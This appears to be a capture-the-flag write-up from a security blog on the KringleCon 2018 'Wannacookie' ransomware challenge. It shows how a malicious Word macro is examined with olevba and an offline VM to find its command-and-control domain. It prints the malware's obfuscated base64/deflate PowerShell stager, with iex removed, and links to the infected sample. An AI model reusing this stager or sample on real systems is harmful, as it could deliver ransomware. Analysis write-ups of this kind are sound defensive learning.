{"id":381,"date":"2019-01-17T06:59:44","date_gmt":"2019-01-17T06:59:44","guid":{"rendered":"https:\/\/mrjsec.co.uk\/blog\/?p=381"},"modified":"2019-01-17T06:59:50","modified_gmt":"2019-01-17T06:59:50","slug":"objective-9-2-identify-the-domain","status":"publish","type":"post","link":"https:\/\/mrjsec.co.uk\/blog\/objective-9-2-identify-the-domain\/","title":{"rendered":"<center>Objective 9.2: Identify the Domain<\/center>"},"content":{"rendered":"\n<p style=\"text-align:center\">In this Objective, we need to identify the domain the malware communicates.<\/p>\n\n\n\n<p style=\"text-align:center\">If we have completed Sleigh Bell Lottery Cranberry Pi terminal by Shinny Upatree, then we get a hint which is.<br>\n&#8220;Sweet candy goodness &#8211; I win! Thank you so much!<br>\nHave you heard that Kringle Castle was hit by new ransomware called Wannacookie?<br>\nSeveral elves reported receiving a cookie recipe Word doc. When opened, a PowerShell screen flashed by, and their files were encrypted.<br>\nMany elves were affected, so Alabaster went to see if he could help out.<br>\nI hope Alabaster watched the PowerShell Malware talk at KringleCon before he tried analysing Wannacookie on his computer.<br>\nAn elf I follow online said he analysed Wannacookie and that it communicates over DNS.<br>\nHe also said that Wannacookie transfers files over DNS and that it looks like it grabs a public key this way.<br>\nAnother recent ransomware made it possible to retrieve crypto keys from memory. Hopefully the same is true for Wannacookie!<br>\nOf course, this all depends on how the key was encrypted and managed in memory. Proper public key encryption requires a private key to decrypt.<br>\nPerhaps there is a flaw in the wannacookie author&#8217;s DNS server that we can manipulate to retrieve what we need.<br>\nIf so, we can retrieve our keys from memory, decrypt the key, and then decrypt our ransomed files.&#8221;<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"520\" height=\"172\" data-attachment-id=\"382\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-2-identify-the-domain\/capture1-12\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture1-11.png?fit=520%2C172&amp;ssl=1\" data-orig-size=\"520,172\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture1-11.png?fit=520%2C172&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture1-11.png?resize=520%2C172&#038;ssl=1\" alt=\"\" class=\"wp-image-382\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture1-11.png?w=520&amp;ssl=1 520w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture1-11.png?resize=300%2C99&amp;ssl=1 300w\" sizes=\"auto, (max-width: 520px) 100vw, 520px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">So, we know it&#8217;s a .doc file, and it&#8217;s malware related, (I&#8217;m thinking macros here).ZIP file (https:\/\/www.holidayhackchallenge.com\/2018\/challenges\/CHOCOLATE_CHIP_COOKIE_RECIPE.zip) (With the password: elves)<br><strong> WARING this file is infected, the opening is doing so at your own risk!<\/strong><\/p>\n\n\n\n<p style=\"text-align:center\">So here is that evil cookie file! (Even do cookies are nice. Is the cookie a lie?) <\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"937\" height=\"471\" data-attachment-id=\"384\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-2-identify-the-domain\/capture2-12\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture2-10.png?fit=937%2C471&amp;ssl=1\" data-orig-size=\"937,471\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture2-10.png?fit=700%2C352&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture2-10.png?fit=700%2C352&amp;ssl=1\" alt=\"\" class=\"wp-image-384\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture2-10.png?w=937&amp;ssl=1 937w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture2-10.png?resize=300%2C151&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture2-10.png?resize=768%2C386&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture2-10.png?resize=700%2C352&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"508\" height=\"195\" data-attachment-id=\"388\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-2-identify-the-domain\/capture33\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture33.png?fit=508%2C195&amp;ssl=1\" data-orig-size=\"508,195\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture33\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture33.png?fit=508%2C195&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture33.png?resize=508%2C195&#038;ssl=1\" alt=\"\" class=\"wp-image-388\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture33.png?w=508&amp;ssl=1 508w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture33.png?resize=300%2C115&amp;ssl=1 300w\" sizes=\"auto, (max-width: 508px) 100vw, 508px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">Uploading the file to (https:\/\/www.virustotal.com) we can see in the details tab that 53% is macros.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"836\" height=\"553\" data-attachment-id=\"385\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-2-identify-the-domain\/capture3-12\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-11.png?fit=836%2C553&amp;ssl=1\" data-orig-size=\"836,553\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture3\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-11.png?fit=700%2C463&amp;ssl=1\" src=\"https:\/\/i1.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-11.png?fit=700%2C463&amp;ssl=1\" alt=\"\" class=\"wp-image-385\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-11.png?w=836&amp;ssl=1 836w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-11.png?resize=300%2C198&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-11.png?resize=768%2C508&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture3-11.png?resize=700%2C463&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">We can use <a href=\"https:\/\/github.com\/decalage2\/oletools\/wiki\/olevba\">olevba<\/a>&#8220;olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, anti-sandboxing and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable filenames, etc).&#8221;<br> We need to find the domain name that the malware is using to communicate with that&#8217;s within the macros, and I&#8217;m guessing PowerShell.<\/p>\n\n\n\n<p style=\"text-align:center\">\u2026\u2026.. However, I wonder what would happen if we open the file? Open the file within a VM (virtual machine) not connected to the internet.<\/p>\n\n\n\n<p style=\"text-align:center\">Well, I guess that worked too! <\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"619\" data-attachment-id=\"386\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-2-identify-the-domain\/capture4-12\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture4-11.png?fit=1024%2C619&amp;ssl=1\" data-orig-size=\"1024,619\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture4\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture4-11.png?fit=700%2C423&amp;ssl=1\" src=\"https:\/\/i1.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture4-11.png?fit=700%2C423&amp;ssl=1\" alt=\"\" class=\"wp-image-386\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture4-11.png?w=1024&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture4-11.png?resize=300%2C181&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture4-11.png?resize=768%2C464&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture4-11.png?resize=700%2C423&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">Moreover, there is the domain name\/answer we needed! &#8220;erohetfanu.com&#8221; I&#8217;m guessing the PowerShell failed to connect to the server (Since the VM has no internet access) and giving us this error, showing the URL!<br>\nIf this had failed, then olevba would have been used. Let&#8217;s use the quick and dirty method? Ha!<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"507\" height=\"130\" data-attachment-id=\"387\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-2-identify-the-domain\/capture5-11\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-10.png?fit=507%2C130&amp;ssl=1\" data-orig-size=\"507,130\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture5\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-10.png?fit=507%2C130&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-10.png?resize=507%2C130&#038;ssl=1\" alt=\"\" class=\"wp-image-387\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-10.png?w=507&amp;ssl=1 507w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture5-10.png?resize=300%2C77&amp;ssl=1 300w\" sizes=\"auto, (max-width: 507px) 100vw, 507px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"508\" height=\"669\" data-attachment-id=\"389\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-2-identify-the-domain\/capture66-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture66-1.png?fit=508%2C669&amp;ssl=1\" data-orig-size=\"508,669\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Capture66\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture66-1.png?fit=508%2C669&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture66-1.png?resize=508%2C669&#038;ssl=1\" alt=\"\" class=\"wp-image-389\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture66-1.png?w=508&amp;ssl=1 508w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/Capture66-1.png?resize=228%2C300&amp;ssl=1 228w\" sizes=\"auto, (max-width: 508px) 100vw, 508px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">However, let&#8217;s use olevba, as we need the code later on to complete Kringlecon.<\/p>\n\n\n\n<p style=\"text-align:center\">First, we need to install Olevba; a guide found <a href=\"https:\/\/github.com\/decalage2\/oletools\/wiki\/Install\">here<\/a>, install on Linux (it works on Windows too!).<br> <\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"781\" height=\"728\" data-attachment-id=\"390\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-2-identify-the-domain\/ol1\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol1.png?fit=781%2C728&amp;ssl=1\" data-orig-size=\"781,728\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ol1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol1.png?fit=700%2C652&amp;ssl=1\" src=\"https:\/\/i1.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol1.png?fit=700%2C652&amp;ssl=1\" alt=\"\" class=\"wp-image-390\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol1.png?w=781&amp;ssl=1 781w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol1.png?resize=300%2C280&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol1.png?resize=768%2C716&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol1.png?resize=700%2C652&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">Next, we need to use Olevba which in Linux is just pointing it to the file &#8220;olevba CHOCOLATE_CHIP_COOKIE_RECIPE.docm&#8221;, now we get some output, and it&#8217;s the PowerShell script retrieved from Olevba.<br>\n<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"782\" height=\"727\" data-attachment-id=\"391\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-2-identify-the-domain\/ol2\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol2.png?fit=782%2C727&amp;ssl=1\" data-orig-size=\"782,727\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ol2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol2.png?fit=700%2C651&amp;ssl=1\" src=\"https:\/\/i1.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol2.png?fit=700%2C651&amp;ssl=1\" alt=\"\" class=\"wp-image-391\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol2.png?w=782&amp;ssl=1 782w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol2.png?resize=300%2C279&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol2.png?resize=768%2C714&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol2.png?resize=700%2C651&amp;ssl=1 700w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">We now need to run it, so it&#8217;s back to Windows (Yes, I&#8217;m aware you can run PowerShell within Linux using pwsh, but I need to fix mine, hence why Windows used).<br>\nBefore running this PowerShell script don&#8217;t forget to remove &#8220;iex&#8221;, this makes the script somewhat harmless.<br>\n&#8220;The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.&#8221; (https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.utility\/invoke-expression?view=powershell-6)<\/p>\n\n\n\n<p style=\"text-align:center\">Which will leave us with this:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> \"sal a New-Object; (a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('lVHRSsMwFP2VSwksYUtoWkxxY4iyir4oaB+EMUYoqQ1syUjToXT7d2\/1Zb4pF5JDzuGce2+a3tXRegcP2S0lmsFA\/AKIBt4ddjbChArBJnCCGxiAbOEMiBsfSl23MKzrVocNXdfeHU2Im\/k8euuiVJRsZ1Ixdr5UEw9LwGOKRucFBBP74PABMWmQSopCSVViSZWre6w7da2uslKt8C6zskiLPJcJyttRjgC9zehNiQXrIBXispnKP7qYZ5S+mM7vjoavXPek9wb4qwmoARN8a2KjXS9qvwf+TSakEb+JBHj1eTBQvVVMdDFY997NQKaMSzZurIXpEv4bYsWfcnA51nxQQvGDxrlP8NxH\/kMy9gXREohG'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()\".<\/code><\/pre>\n\n\n\n<p style=\"text-align:center\"><br> So if we run it within Windows, we get this <a href=\"https:\/\/pastebin.com\/raw\/GtzuxYW3\">output<\/a>.<br> <\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"1899\" height=\"253\" data-attachment-id=\"392\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/objective-9-2-identify-the-domain\/ol3\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol3.png?fit=1899%2C253&amp;ssl=1\" data-orig-size=\"1899,253\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ol3\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol3.png?fit=700%2C93&amp;ssl=1\" src=\"https:\/\/i2.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol3.png?fit=700%2C93&amp;ssl=1\" alt=\"\" class=\"wp-image-392\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol3.png?w=1899&amp;ssl=1 1899w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol3.png?resize=300%2C40&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol3.png?resize=768%2C102&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol3.png?resize=700%2C93&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/ol3.png?w=1400&amp;ssl=1 1400w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">Moreover, that&#8217;s how we can get the code which is needed later on with Kringlecon.<\/p>\n\n\n\n<p style=\"text-align:center\">Also, <a href=\"https:\/\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2019\/01\/CHOCOLATE_CHIP_COOKIE_RECIPE.pdf\">here<\/a> is the cookie recipe. Don&#8217;t worry it&#8217;s macro-free!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this Objective, we need to identify the domain the malware communicates. If we have completed Sleigh Bell Lottery Cranberry Pi terminal by Shinny Upatree, then we get a hint which is. &#8220;Sweet candy goodness&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[10],"tags":[13,14,12],"class_list":["post-381","post","type-post","status-publish","format-standard","hentry","category-kringlecon-2018","tag-13","tag-ctf","tag-kringlecon"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/paD3U6-69","_links":{"self":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/381","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/comments?post=381"}],"version-history":[{"count":2,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/381\/revisions"}],"predecessor-version":[{"id":394,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/381\/revisions\/394"}],"wp:attachment":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/media?parent=381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/categories?post=381"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/tags?post=381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}